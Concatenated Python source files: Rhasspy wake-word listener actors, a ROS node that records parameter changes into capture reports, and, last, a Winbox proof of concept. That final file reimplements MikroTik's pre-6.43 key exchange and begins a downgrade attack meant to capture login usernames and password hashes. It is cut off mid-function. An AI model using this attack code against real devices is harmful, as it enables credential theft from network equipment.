                                self.send(receiver, not_detected_event)
            elif isinstance(message, StopListeningForWakeWord):
                if message.clear_all:
                    self.receivers.clear()
                else:
                    try:
                        self.receivers.remove(message.receiver or sender)
                    except ValueError:
                        pass

                if len(self.receivers) == 0:
                    if message.record:
                        self.send(self.recorder, StopStreaming(self.myAddress))

                    self.transition("loaded")
            elif isinstance(message, str):
                # Detected (the runner's on_activation callback sends a
                # string message to this actor)
                self._logger.debug("Hotword detected (%s)", self.model_name)
                detected_event = WakeWordDetected(
                    self.model_name, audio_data_info=self.audio_info
                )
                for receiver in self.receivers:
                    self.send(receiver, detected_event)
            elif isinstance(message, PauseListeningForWakeWord):
                self.transition("paused")
        except Exception:
            self._logger.exception("in_listening")

    def in_paused(self, message: Any, sender: RhasspyActor) -> None:
        """Handle messages in paused state."""
        if isinstance(message, ResumeListeningForWakeWord):
            self.transition("listening")

    def to_stopped(self, from_state: str) -> None:
        """Transition to stopped state: shut down the background runner."""
        self.stream = None
        if self.runner is not None:
            self.runner.stop()

    # -------------------------------------------------------------------------

    def load_runner(self) -> None:
        """Load precise runner (engine and runner are each created once)."""
        if self.engine is None:
            # pylint: disable=E0401
            from precise_runner import PreciseEngine

            self.model_name = self.profile.get("wake.precise.model", "hey-mycroft-2.pb")
            self.model_path = self.profile.read_path(self.model_name)
            self.engine_path = os.path.expandvars(
                self.profile.get("wake.precise.engine_path", "precise-engine")
            )

            self._logger.debug("Loading Precise engine at %s", self.engine_path)
            self.engine = PreciseEngine(
                self.engine_path, self.model_path, chunk_size=self.chunk_size
            )

        if self.runner is None:
            # pylint: disable=E0401
            from precise_runner import PreciseRunner, ReadWriteStream

            self.stream = ReadWriteStream()

            sensitivity = float(self.profile.get("wake.precise.sensitivity", 0.5))
            trigger_level = int(self.profile.get("wake.precise.trigger_level", 3))

            def on_prediction(prob: float) -> None:
                # Signal in_listening that one chunk has been scored.
                self.prediction_sem.release()

            def on_activation() -> None:
                self.detected = True
                # Message self so detection is handled on the actor thread.
                self.send(self.myAddress, "activated")

            self.runner = PreciseRunner(
                self.engine,
                stream=self.stream,
                sensitivity=sensitivity,
                trigger_level=trigger_level,
                on_activation=on_activation,
                on_prediction=on_prediction,
            )

            assert self.runner is not None
            self.runner.start()

            self._logger.debug(
                "Loaded Mycroft Precise (model=%s, sensitivity=%s, trigger_level=%s)",
                self.model_path,
                sensitivity,
                trigger_level,
            )

    # -------------------------------------------------------------------------

    def get_problems(self) -> Dict[str, Any]:
        """Get problems at startup."""
        problems: Dict[str, Any] = {}
        try:
            # pylint: disable=E0401,W0611
            from precise_runner import PreciseRunner, ReadWriteStream  # noqa: F401
        except Exception:
            problems[
                "precise_runner not installed"
            ] = "The precise_runner Python library is not installed. Try pip3 install precise_runner"

        engine_path = os.path.expandvars(
            self.profile.get("wake.precise.engine_path", "precise-engine")
        )

        if not os.path.exists(engine_path) and not shutil.which(engine_path):
            problems[
                "Missing precise-engine"
            ] = 'The Mycroft Precise engine is not installed. Follow the <a href="https://github.com/MycroftAI/mycroft-precise#binary-install">binary install instructions</a>.'

        model_name = self.profile.get("wake.precise.model", "hey-mycroft-2.pb")
        model_path = self.profile.read_path(model_name)
        if not os.path.exists(model_path):
            problems[
                "Missing model"
            ] = f"Your Mycroft Precise model could not be loaded from {model_path}"

        return problems
# -----------------------------------------------------------------------------
# MQTT-based wake listener (Hermes protocol)
# https://docs.snips.ai/reference/hermes
# -----------------------------------------------------------------------------
class HermesWakeListener(RhasspyActor):
    """Listens for a wake word using MQTT (Hermes hotword protocol).

    Detection happens on a remote system; this actor only subscribes to the
    hermes/hotword/<id>/detected topic and forwards matching messages.
    """

    def __init__(self) -> None:
        RhasspyActor.__init__(self)
        self.receivers: List[RhasspyActor] = []
        # NOTE(review): initialized as a str but replaced with a list of
        # site ids in to_started (mqtt.site_id split on ",").
        self.site_ids = "default"
        self.wakeword_id = "default"
        self.wake_topic = ""
        self.mqtt: Optional[RhasspyActor] = None

    def to_started(self, from_state: str) -> None:
        """Transition to started state."""
        self.mqtt = self.config["mqtt"]

        # Subscribe to wake topic
        self.site_ids = self.profile.get("mqtt.site_id", "default").split(",")
        self.wakeword_id = self.profile.get("wake.hermes.wakeword_id", "default")
        self.wake_topic = f"hermes/hotword/{self.wakeword_id}/detected"
        self.send(self.mqtt, MqttSubscribe(self.wake_topic))

        self.transition("loaded")

    def in_loaded(self, message: Any, sender: RhasspyActor) -> None:
        """Handle messages in loaded state."""
        if isinstance(message, ListenForWakeWord):
            self.receivers.append(message.receiver or sender)
            self.transition("listening")

    def in_listening(self, message: Any, sender: RhasspyActor) -> None:
        """Handle messages in listening state."""
        if isinstance(message, MqttMessage):
            if message.topic == self.wake_topic:
                # Check site ID (ignore detections from other sites)
                payload = json.loads(message.payload.decode())
                payload_site_id = payload.get("siteId", "")
                if payload_site_id not in self.site_ids:
                    self._logger.debug(
                        "Got detected message, but wrong site id (%s)", payload_site_id
                    )
                    return

                # Pass downstream to receivers
                self._logger.debug("Hotword detected (%s)", self.wakeword_id)
                result = WakeWordDetected(self.wakeword_id)
                for receiver in self.receivers:
                    self.send(receiver, result)
        elif isinstance(message, StopListeningForWakeWord):
            if message.clear_all:
                self.receivers.clear()
            else:
                try:
                    self.receivers.remove(message.receiver or sender)
                except ValueError:
                    pass

            if len(self.receivers) == 0:
                self.transition("loaded")
        elif isinstance(message, PauseListeningForWakeWord):
            self.transition("paused")

    def in_paused(self, message: Any, sender: RhasspyActor) -> None:
        """Handle messages in paused state."""
        if isinstance(message, ResumeListeningForWakeWord):
            self.transition("listening")
# -----------------------------------------------------------------------------
# Porcupine Wake Listener
# https://github.com/Picovoice/Porcupine
# -----------------------------------------------------------------------------
class PorcupineWakeListener(RhasspyActor):
    """Wake word listener that uses picovoice's porcupine library.

    Audio is accumulated in a byte buffer, unpacked into 16-bit samples,
    and fed frame-by-frame to the porcupine handle.
    """

    def __init__(self):
        RhasspyActor.__init__(self)
        # Unconsumed audio bytes; carved into chunk_size frames.
        self.audio_buffer: bytes = bytes()
        # struct format ("h" per sample) matching the handle's frame length.
        self.chunk_format = ""
        self.chunk_size = 1024
        self.handle = None
        self.keyword_paths: List[Path] = []
        self.library_path = ""
        self.model_path = ""
        self.preload: bool = False
        self.receivers: List[RhasspyActor] = []
        self.recorder: Optional[RhasspyActor] = None
        self.sensitivities = []
        self.wake_proc = None

    def to_started(self, from_state: str) -> None:
        """Transition to started state."""
        self.recorder = self.config["recorder"]
        self.library_path = self.profile.read_path(
            self.profile.get(
                "wake.porcupine.library_path", "porcupine/libpv_porcupine.so"
            )
        )
        self.model_path = self.profile.read_path(
            self.profile.get(
                "wake.porcupine.model_path", "porcupine/porcupine_params.pv"
            )
        )
        # Comma-separated lists: one keyword file (and sensitivity) per hotword.
        self.keyword_paths = [
            Path(self.profile.read_path(p))
            for p in self.profile.get(
                "wake.porcupine.keyword_path", "porcupine/porcupine.ppn"
            ).split(",")
        ]
        self.sensitivities = [
            float(s)
            for s in str(self.profile.get("wake.porcupine.sensitivity", "0.5")).split(
                ","
            )
        ]

        self.preload = self.config.get("preload", False)
        if self.preload:
            try:
                self.load_handle()
            except Exception:
                self._logger.exception("loading wake handle")

    def in_started(self, message: Any, sender: RhasspyActor) -> None:
        """Handle messages in started state."""
        if isinstance(message, ListenForWakeWord):
            try:
                self.load_handle()
                self.receivers.append(message.receiver or sender)
                self.transition("listening")

                if message.record:
                    self.send(self.recorder, StartStreaming(self.myAddress))
            except Exception:
                self._logger.exception("loading wake handle")

    def in_listening(self, message: Any, sender: RhasspyActor) -> None:
        """Handle messages in listening state."""
        if isinstance(message, AudioData):
            self.audio_buffer += message.data
            num_chunks = len(self.audio_buffer) // self.chunk_size
            if num_chunks > 0:
                assert self.handle is not None
                for _ in range(num_chunks):
                    chunk = self.audio_buffer[: self.chunk_size]
                    unpacked_chunk = struct.unpack_from(self.chunk_format, chunk)
                    self.audio_buffer = self.audio_buffer[self.chunk_size :]

                    # Process chunk
                    keyword_index = self.handle.process(unpacked_chunk)
                    # NOTE(review): truthiness test — a multi-keyword handle
                    # returning index 0 would be treated as "not detected";
                    # confirm against the porcupine process() return contract.
                    if keyword_index:
                        if len(self.keyword_paths) == 1:
                            keyword_index = 0

                        wakeword_name = str(keyword_index)
                        if keyword_index < len(self.keyword_paths):
                            wakeword_name = self.keyword_paths[keyword_index].stem

                        # Pass downstream to receivers
                        self._logger.debug("Hotword detected (%s)", keyword_index)
                        result = WakeWordDetected(wakeword_name)
                        for receiver in self.receivers:
                            self.send(receiver, result)
        elif isinstance(message, WakeWordDetected):
            # Pass downstream to receivers
            self._logger.debug("Hotword detected (%s)", message.name)
            for receiver in self.receivers:
                self.send(receiver, message)
        elif isinstance(message, WakeWordNotDetected):
            # Pass downstream to receivers
            for receiver in self.receivers:
                self.send(receiver, message)
        elif isinstance(message, StopListeningForWakeWord):
            if message.clear_all:
                self.receivers.clear()
            else:
                try:
                    self.receivers.remove(message.receiver or sender)
                except ValueError:
                    pass

            if len(self.receivers) == 0:
                if message.record:
                    self.send(self.recorder, StopStreaming(self.myAddress))

                # Free the native handle; re-created on next listen.
                if self.handle is not None:
                    self.handle.delete()
                    self.handle = None

                self.transition("started")
        elif isinstance(message, PauseListeningForWakeWord):
            self.transition("paused")

    def in_paused(self, message: Any, sender: RhasspyActor) -> None:
        """Handle messages in paused state."""
        if isinstance(message, ResumeListeningForWakeWord):
            self.transition("listening")

    def load_handle(self):
        """Load porcupine library (creates the native handle once)."""
        if self.handle is None:
            for kw_path in self.keyword_paths:
                assert kw_path.is_file(), f"Missing {kw_path}"

            from porcupine import Porcupine

            self.handle = Porcupine(
                self.library_path,
                self.model_path,
                keyword_file_paths=[str(p) for p in self.keyword_paths],
                sensitivities=self.sensitivities,
            )

            # 16-bit samples: two bytes per sample in the frame.
            self.chunk_size = self.handle.frame_length * 2
            self.chunk_format = "h" * self.handle.frame_length

            self._logger.debug(
                "Loaded porcupine (keyword=%s). Expecting sample rate=%s, frame length=%s",
                self.keyword_paths,
                self.handle.sample_rate,
                self.handle.frame_length,
            )
# -----------------------------------------------------------------------------
# Command Wake Listener
# -----------------------------------------------------------------------------
class CommandWakeListener(RhasspyActor):
    """Wake word listener that delegates detection to an external program.

    The configured command line is launched when listening begins; whatever
    the program prints to stdout before exiting is treated as the wakeword
    id (empty output means no detection).
    """

    def __init__(self):
        RhasspyActor.__init__(self)
        self.receivers: List[RhasspyActor] = []
        self.wake_proc = None
        self.command: List[str] = []

    def to_started(self, from_state: str) -> None:
        """Transition to started state: resolve the command line from the profile."""
        program = os.path.expandvars(self.profile.get("wake.command.program"))
        arguments = [
            os.path.expandvars(str(a))
            for a in self.profile.get("wake.command.arguments", [])
        ]
        self.command = [program] + arguments

    def in_started(self, message: Any, sender: RhasspyActor) -> None:
        """Handle messages in started state."""
        if not isinstance(message, ListenForWakeWord):
            return

        self.receivers.append(message.receiver or sender)
        self.wake_proc = subprocess.Popen(self.command, stdout=subprocess.PIPE)

        def post_result() -> None:
            # STDOUT -> text
            try:
                stdout_data, _ = self.wake_proc.communicate()
                wakeword_id = stdout_data.decode().strip()
            except Exception:
                wakeword_id = ""
                self._logger.exception("post_result")

            # Actor will forward
            if wakeword_id:
                self.send(self.myAddress, WakeWordDetected(wakeword_id))
            else:
                self.send(self.myAddress, WakeWordNotDetected(wakeword_id))

        self.transition("listening")

        # Wait for program in a separate thread
        threading.Thread(target=post_result, daemon=True).start()

    def in_listening(self, message: Any, sender: RhasspyActor) -> None:
        """Handle messages in listening state."""
        if isinstance(message, WakeWordDetected):
            # Fan the detection out to every registered receiver
            self._logger.debug("Hotword detected (%s)", message.name)
            for target in self.receivers:
                self.send(target, message)
        elif isinstance(message, WakeWordNotDetected):
            # Fan the non-detection out to every registered receiver
            for target in self.receivers:
                self.send(target, message)
        elif isinstance(message, StopListeningForWakeWord):
            if message.clear_all:
                self.receivers.clear()
            else:
                try:
                    self.receivers.remove(message.receiver or sender)
                except ValueError:
                    pass

            if not self.receivers:
                # Nobody left listening: kill the external program and
                # return to the idle started state.
                if self.wake_proc is not None:
                    self.wake_proc.terminate()

                self.transition("started")
        elif isinstance(message, PauseListeningForWakeWord):
            self.transition("paused")

    def in_paused(self, message: Any, sender: RhasspyActor) -> None:
        """Handle messages in paused state."""
        if isinstance(message, ResumeListeningForWakeWord):
            self.transition("listening")
|
rosparam_capture.py | #!/usr/bin/python3
#******************************************************************************
#
#"Distribution A: Approved for public release; distribution unlimited. OPSEC #4046"
#
#PROJECT: DDR
#
# PACKAGE :
# ORIGINAL AUTHOR :
# MODIFIED DATE :
# MODIFIED BY :
# REVISION :
#
# Copyright (c) 2020 DCS Corporation
#
# Unlimited Rights assigned to the U.S. Government
#
# This material may be reproduced by or for the U.S Government pursuant
# to the copyright license under the clause at DFARS 252.227-7013. This
# notice must appear in all copies of this file and its derivatives.
#******************************************************************************
#
#Copyright (c) 2019-2020 U.S. Federal Government (in countries where recognized)
#Permission is hereby granted, free of charge, to any person obtaining a copy of
#this software and associated documentation files (the "Software"), to deal in
#the Software without restriction, including without limitation the rights to use,
#copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the
#Software, and to permit persons to whom the Software is furnished to do so,
#subject to the following conditions:
#
#The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
#THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
#EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
#MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT.
#IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM,
#DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE,
#ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER
#DEALINGS IN THE SOFTWARE.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import os
from collections import deque
import threading
import datetime
import time
import rospy
import rosbag
from rosbag.bag import ROSBagException
from std_msgs.msg import String
## Documentation for RosparamCapture class
#
# Class collects all rosparams at startup, and all changes to the
# rosparams during runtime. When a capture occurs, it determines
# which rosparams were active during the capture and writes all the
# rosparams, their start and end times and their values to a file
# in the capture folder.
class RosparamCapture():
    ## The constructor.
    #
    # Registers the node, snapshots every rosparam currently on the
    # parameter server, then starts two worker threads: one polling the
    # server for value changes and one draining the queue of capture
    # paths announced on the /ddr/ros_connections topic.
    def __init__(self):
        rospy.init_node("rosparam_capture")
        ## @var self.captures_queue
        # a member variable - a queue of ddr capture paths
        self.captures_queue = deque()
        ## @var self.capture_start_time
        # a member variable - the start time of the capture being
        # processed
        self.capture_start_time = 0.0
        ## @var self.capture_end_time
        # a member variable - the end time of the capture being
        # processed
        self.capture_end_time = 0.0
        ## @var self.capture_path
        # a member variable - the path to the current capture being
        # processed
        self.capture_path = ""
        ## @var self.param_names
        # a member variable - a list of rosparams on the parameter server
        self.param_names = rospy.get_param_names()
        ## @var self.param_dict
        # a member variable - master dictionary of rosparams, values and times.
        self.param_dict = {}
        ## @var self.param_server_dict
        # a member variable - dictionary of rosparams and values received
        # from the parameter server. This holds the latest values and will
        # get updated into self.param_dict
        self.param_server_dict = {}
        # NOTE(review): the sleeps below appear to give the parameter server
        # time to settle between setup steps -- confirm they are required.
        print("start param setup!")
        time.sleep(5)
        print("sleep1!")
        self.get_dict_from_param_server()
        time.sleep(10)
        print("sleep2!")
        self.initialize_dictionary()
        time.sleep(5)
        print("sleep3!")
        thread1 = threading.Thread(target=self.insert_param_vals)
        thread1.start()
        time.sleep(5)
        print("sleep4")
        thread2 = threading.Thread(target=self.process_queue)
        thread2.start()
        print("rosparam setup complete! safe to create captures")
        rospy.Subscriber("/ddr/ros_connections", String,
                         self.ros_connections_callback)

    ## Documentation for the flatten_dict function
    #
    # Recursive function that flattens a nested dictionary with a '/'
    # between levels. Leaf values are keyed by their full '/'-joined
    # path; a non-dict input is returned as {prefix: value}.
    def flatten_dict(self, dic, separator='/', prefix=""):
        if not isinstance(dic, dict):
            return {prefix: dic}
        flat = {}
        for key, value in dic.items():
            for sub_key, sub_val in \
                    self.flatten_dict(value, separator, key).items():
                full_key = prefix + separator + sub_key if prefix else sub_key
                flat[full_key] = sub_val
        return flat

    ## Documentation for initialize_dictionary method
    #
    # Method initializes the self.param_dict member variable using the list
    # of all rosparams collected from the parameter server where each rosparam
    # is a key in the dictionary and its values are the time when we start
    # tracking rosparams and the current starting value of the rosparam.
    # This method performs some paring of the data, stripping '\n' from
    # rosparam values and deleting the rosparam /robot_model/robot_description
    # from the dictionary of rosparams tracked.
    def initialize_dictionary(self):
        self.param_dict = dict.fromkeys(self.param_names)
        # Remove this ROSParam from dictionary and param_names list
        # This param value is a .xml file
        if "/robot_model/robot_description" in self.param_dict:
            del self.param_dict["/robot_model/robot_description"]
            self.param_names.remove("/robot_model/robot_description")
        unformatted_time = rospy.get_time()
        for param_name in self.param_names:
            try:
                param_val = self.flattened_dict[param_name]
            except KeyError:
                print("rosparam not found: ", param_name)
                print("if you see this you have a networking problem")
                print("I can't get your param values, restart roscore")
                # Previously this fell through and reused the previous
                # iteration's value (NameError on the first one); skip
                # the missing param instead.
                continue
            if isinstance(param_val, str):
                if param_val.endswith('\n'):
                    param_val = param_val.strip('\n')
            val_pair = [unformatted_time, param_val]
            self.param_dict[param_name] = [val_pair]

    ## Documentation for get_dict_from_param_server method
    #
    # Method pings the parameter server for all of the most recent rosparam
    # values, which are returned in the form of a nested dictionary. After
    # retrieving, the dictionary keys are formatted by first removing all
    # '/' from the key names and then adding back a single '/' at the head
    # of the name and then flattens the nested dictionary.
    def get_dict_from_param_server(self):
        self.param_server_dict = rospy.get_param('/')
        # Iterate over a snapshot of the keys: renaming mutates the dict,
        # which is unsafe while iterating the dict itself.
        for old_key in list(self.param_server_dict):
            new_key = '/' + old_key.strip('/')
            if new_key != old_key:
                self.param_server_dict[new_key] = \
                    self.param_server_dict.pop(old_key)
        self.flattened_dict = self.flatten_dict(self.param_server_dict)

    ## Documentation for insert_param_vals method
    #
    # The dictionary is designed to have a 2D list of values for each key with
    # the following format:
    # {'key': [[start_time, 'value'],
    #          [end_time, 'value'],
    #          [start_time, new_val],
    #          [end_time, new_val]]}
    #
    # Method continuously polls the parameter server looking for rosparam
    # changes comparing the newly retrieved values to those stored in
    # self.param_dict. If no new value is found, the end_time gets updated to
    # the current time. If a new value is found, a new set of values is added
    # to the dictionary.
    def insert_param_vals(self):
        # slowing down did not reduce cpu utilization
        #rate = rospy.Rate(0.2)
        while not rospy.is_shutdown():
            self.get_dict_from_param_server()
            unformatted_time = rospy.get_time()
            for param_name in self.param_names:
                try:
                    param_val = self.flattened_dict[param_name]
                except KeyError:
                    # Param vanished from the server between polls; skip it
                    # rather than letting the KeyError kill this thread.
                    continue
                if isinstance(param_val, str):
                    if param_val.endswith('\n'):
                        param_val = param_val.strip('\n')
                val_pair = [unformatted_time, param_val]
                vals = self.param_dict.get(param_name)
                if vals is None:
                    # Param had no initial value; start tracking it now.
                    self.param_dict[param_name] = [val_pair]
                    continue
                if len(vals) < 2:
                    # add a new list row to the key (first end-time row)
                    vals.append(val_pair)
                elif vals[-2][1] == param_val:
                    # Value unchanged: extend the end time in place. "vals"
                    # aliases the list stored in param_dict, so no re-insert
                    # is needed (the old dict.update(param_name=vals) call
                    # wrongly created a literal 'param_name' key).
                    vals[-1][0] = unformatted_time
                else:
                    # Value changed: start a new (start, end) pair.
                    vals.append(val_pair)

    ## Documentation for ros_connection_callback method
    #
    # Method is the callback subscribed to the /ddr/ros_connections topic.
    # Every time /ddr/ros_connections publishes a new capture has occurred,
    # a capture path is added to a queue for processing
    def ros_connections_callback(self, msg):
        capture_path = str(msg.data)
        self.captures_queue.append(capture_path)

    ## Documentation for process_queue method
    #
    # Method to initiate processing of all captures in the queue. Method calls
    # self.collect_capture_begin_end_times for each capture, oldest first.
    def process_queue(self):
        while not rospy.is_shutdown():
            if len(self.captures_queue) > 0:
                try:
                    # popleft(): captures arrive in order, so process them
                    # FIFO (pop() would handle the newest first).
                    self.capture_path = self.captures_queue.popleft()
                    self.collect_capture_begin_end_times(self.capture_path)
                except IndexError:
                    print("Queue index out of range: ",
                          str(len(self.captures_queue)) + " " +
                          self.capture_path)
                    continue
            else:
                # Yield the CPU instead of spinning hot on an empty queue.
                time.sleep(0.1)

    ## Documentation for collect_capture_begin_end_times method
    #
    # Method takes the path of the current capture being worked on and collects
    # the start and end times of the capture from the bag files in the capture
    # folder and sets the member variables self.capture_start_time and
    # self.capture_end_time. After collecting the capture start and end times,
    # the method calls the method query_and_write()
    def collect_capture_begin_end_times(self, capture_path):
        for bag_file in os.listdir(capture_path):
            if bag_file.endswith('.bag'):
                bag = rosbag.Bag(os.path.join(capture_path, bag_file))
                try:
                    start_time = bag.get_start_time()
                    end_time = bag.get_end_time()
                    if start_time == 0.0:
                        continue
                    if self.capture_start_time == 0.0 or \
                            start_time < self.capture_start_time:
                        self.capture_start_time = start_time
                    if end_time > self.capture_end_time:
                        self.capture_end_time = end_time
                except ROSBagException:
                    print(bag_file + " is empty")
                finally:
                    # Always release the bag's file handle.
                    bag.close()
        self.query_and_write()
        self.capture_start_time = 0.0
        self.capture_end_time = 0.0

    ## Documentation for query_and_write method
    #
    # Method creates and opens a new file in the capture folder. It gets the
    # self.param_dict key's values and queries these values to determine the
    # active rosparam value(s) during the capture based on the capture start
    # and end times. It then writes the dictionary keys, values and start and
    # end times for each rosparam value which was active during the capture to
    # a table in the file.
    # This method calls the write_header method, which writes the capture
    # start and stop times to the file and sets up the table.
    # This method calls the write_values method, which writes the rosparam
    # start, end, param name and value(s) to the markdown table.
    # Note, this table is best viewed using a markdown reader.
    def query_and_write(self):
        capture_name = os.path.basename(self.capture_path)
        report_path = self.capture_path + "/" + capture_name + \
            "_rosparam_report.md"
        with open(report_path, 'a') as fout:
            self.write_header(fout, capture_name)
            for param in self.param_names:
                dict_vals = self.param_dict.get(param)
                if not dict_vals:
                    # Param was never successfully read; nothing to report.
                    continue
                # Rows come in (start, end) pairs; stop before a trailing
                # unpaired row so dict_vals[i+1] cannot go out of range.
                for i in range(0, len(dict_vals) - 1, 2):
                    param_start_time = datetime.datetime.utcfromtimestamp(
                        dict_vals[i][0]).strftime('%H:%M:%S.2%f')
                    param_end_time = datetime.datetime.utcfromtimestamp(
                        dict_vals[i+1][0]).strftime('%H:%M:%S.2%f')
                    if dict_vals[i][0] >= self.capture_start_time and \
                            dict_vals[i+1][0] <= self.capture_end_time:
                        self.write_values(fout, param_start_time,
                                          param_end_time, param,
                                          str(dict_vals[i][1]))
                    elif dict_vals[i][0] <= self.capture_start_time and \
                            dict_vals[i+1][0] >= self.capture_start_time:
                        self.write_values(fout, param_start_time,
                                          param_end_time, param,
                                          str(dict_vals[i][1]))
                    elif dict_vals[i][0] <= self.capture_end_time and \
                            dict_vals[i+1][0] >= self.capture_end_time:
                        self.write_values(fout, param_start_time,
                                          param_end_time, param,
                                          str(dict_vals[i][1]))
                    else:
                        print("dict_vals: " + param_start_time + " " +
                              param_end_time + param + str(dict_vals[i][1]) +
                              " are outside the capture window")
            print("ROSParam report for " + capture_name + " has been generated")

    ## Documentation for write_header method
    #
    # Method writes to the output file, the capture name, the start and end
    # times of the capture and sets up the markdown table.
    # This method is called by the query_and_write method
    def write_header(self, fout, capture_name):
        format_cap_start_time = datetime.datetime.utcfromtimestamp(
            self.capture_start_time).strftime('%b %d, %Y %H:%M:%S.%f')
        format_cap_end_time = datetime.datetime.utcfromtimestamp(
            self.capture_end_time).strftime('%b %d, %Y %H:%M:%S.%f')
        fout.write("## Capture Name: " + capture_name + "\n")
        fout.write("\n")
        fout.write("#### Capture Start: " + format_cap_start_time + '\n')
        fout.write("#### Capture End: " + format_cap_end_time + '\n')
        fout.write("#### Rosparams\n")
        fout.write("| Start Time | End Time | ROSParam | Value |\n")
        fout.write("| --- | --- | --- | --- |\n")

    ## Documentation for the write_values method
    #
    # Method takes the output file, the rosparam start time, end time, the
    # param and it's value and writes to the output file.
    # This method is called by the query_and_write method.
    @classmethod
    def write_values(cls, fout, start_time, end_time, ros_param, value):
        fout.write("|" + start_time + "|" + end_time + "|" +
                   ros_param + "|" + value + "|\n")
def main():
    """Instantiate the capture node and hand control to rospy until shutdown."""
    RosparamCapture()
    rospy.spin()
## Driver Script
if __name__ == "__main__":
    main()
|
winbox_server.py | import random
import threading
import socket
import sys
import time
##
# This file implements the Winbox server's key exchange and encryption mechanism
# for Winbox before 6.43. The key exchange is Diffie Hellman using a 1984 bit
# non-standard prime and the encryption is a custom RC4 drop-3072 using a 124
# byte session key.
#
# This server won't respond to the initial ECSRP-5 message from the client. When
# that happens, the client will then switch to the DH implementation.
##
##
# Obj: RC4
#
# An implementation of the RC4 logic used by MikroTik's Winbox on versions
# before 6.43. This is an RC4 drop-3072 with various non-standard mixing. The
# expected key is 0x78 bytes and is half of a session key generated / exchanged
# via Diffie Hellman key exchange.
##
class RC4:
    """MikroTik Winbox (pre-6.43) RC4-drop-3072 variant.

    Non-standard in two ways compared to textbook RC4 drop-3072:

    1. the value of ``j`` left over from key scheduling is carried into
       later computations instead of being reset to 0, and
    2. an extra state byte ``k`` mixes the previous plaintext (server
       side) or ciphertext (client side) byte back into the stream.

    The expected key is 0x78 bytes: one half of the 0xf8-byte Diffie-
    Hellman session secret.
    """

    def __init__(self, key):
        """Run the (modified) key schedule and drop 3072 keystream bytes."""
        state = list(range(0x100))
        mix = 0
        for idx in range(0x100):
            mix = (mix + key[idx % len(key)] + state[idx]) & 0xFF
            state[idx], state[mix] = state[mix], state[idx]
        self.S = state
        self.i = 0
        self.j = mix  # non-standard: j survives key scheduling
        self.k = 0    # non-standard feedback byte (see send_block_crypt)
        # "drop" 3072 bytes of key stream
        for _ in range(0xC00):
            self.gen()

    def gen(self):
        """Produce one standard RC4 keystream byte. *Only* used by __init__."""
        self.i = (self.i + 1) & 255
        self.j = (self.j + self.S[self.i]) & 255
        a, b = self.i, self.j
        self.S[a], self.S[b] = self.S[b], self.S[a]
        return self.S[(self.S[a] + self.S[b]) & 255]

    def send_block_crypt(self, data, padding, client=False):
        """XOR-crypt ``data`` and ``padding``; return padding + data.

        ``client`` selects which side's byte feeds the ``k`` mixer: the
        decrypted output when decrypting client traffic, the input when
        encrypting server traffic (where ``k`` is also reset afterwards).
        """
        body = bytearray(data)
        length = len(body)
        j = self.j
        for pos in range(length):
            i = (self.i + pos + 1) & 255
            j = (j + self.k + self.S[i]) & 255
            self.S[i], self.S[j] = self.S[j], self.S[i]
            body[pos] = data[pos] ^ self.S[(self.S[i] + self.S[j]) & 255]
            # Feed the previous byte back into the stream state.
            self.k = body[pos] if client else data[pos]
        # Full 256-entry remix pass between payload and padding.
        j = self.k + j
        for i in range(256):
            j = (j + self.S[i]) & 0xFF
            self.S[i], self.S[j] = self.S[j], self.S[i]
        pad_out = bytearray(10)
        for pos in range(10):
            i = (pos + (self.i + length + 1)) & 255
            j = (j + self.S[i]) & 0xFF
            self.S[i], self.S[j] = self.S[j], self.S[i]
            pad_out[pos] = padding[pos] ^ self.S[(self.S[i] + self.S[j]) & 255]
        self.i = length + 10
        self.j = j
        if not client:
            self.k = 0
        return pad_out + body
def downgrade_attack(sock):
    """Serve one Winbox client, forcing the pre-6.43 DH key exchange.

    Ignores the client's initial ECSRP-5 offer so it falls back to
    Diffie-Hellman, completes the DH exchange, seeds the two RC4 engines
    from the session secret, decrypts the salt and login requests, and
    prints the username and MD5 password hash from the login message.

    NOTE(review): sock.recv(n) may legally return fewer than n bytes (or
    b'' on disconnect); this PoC assumes complete reads -- confirm that is
    acceptable for its use.
    """
    # Currently just listening for messages to 5 (DH) and 6 (ECSRP)
    message_length = sock.recv(1)
    handler = sock.recv(1)
    if (handler[0] == 5):
        print('No need to downgrade. Received DH request.')
    elif (handler[0] == 6):
        # ignore this packet. This should trigger a DH request
        ignore = sock.recv(message_length[0])
        # the client should send a DH key exchange request now
        message_length = sock.recv(1)
        handler = sock.recv(1)
        if (handler[0] != 5):
            print('Client didn\'t request a DH key exchange: %x' % handler[0])
            sock.close()
            return
    else:
        print('Client didn\'t request a key exchange: %x' % handler[0])
        sock.close()
        return
    # The client's DH public value is always 0xf8 bytes for this prime.
    if (message_length[0] != 0xf8):
        print('[-] Client sent unexpected amount of DH public data: %x' % message_length[0])
        sock.close()
        return
    client_public_bytes = sock.recv(message_length[0])
    client_public = int.from_bytes(client_public_bytes, byteorder='big', signed=False)
    print('[+] Received client\'s public component:')
    print('\t%x' % client_public)
    print('[+] Generating a secret:')
    local_secret = random.getrandbits(128)
    print('\t%x' % local_secret)
    print('[+] Computing server\'s public component: ')
    # Non-standard 1984-bit DH prime hard-coded in Winbox; generator is 5.
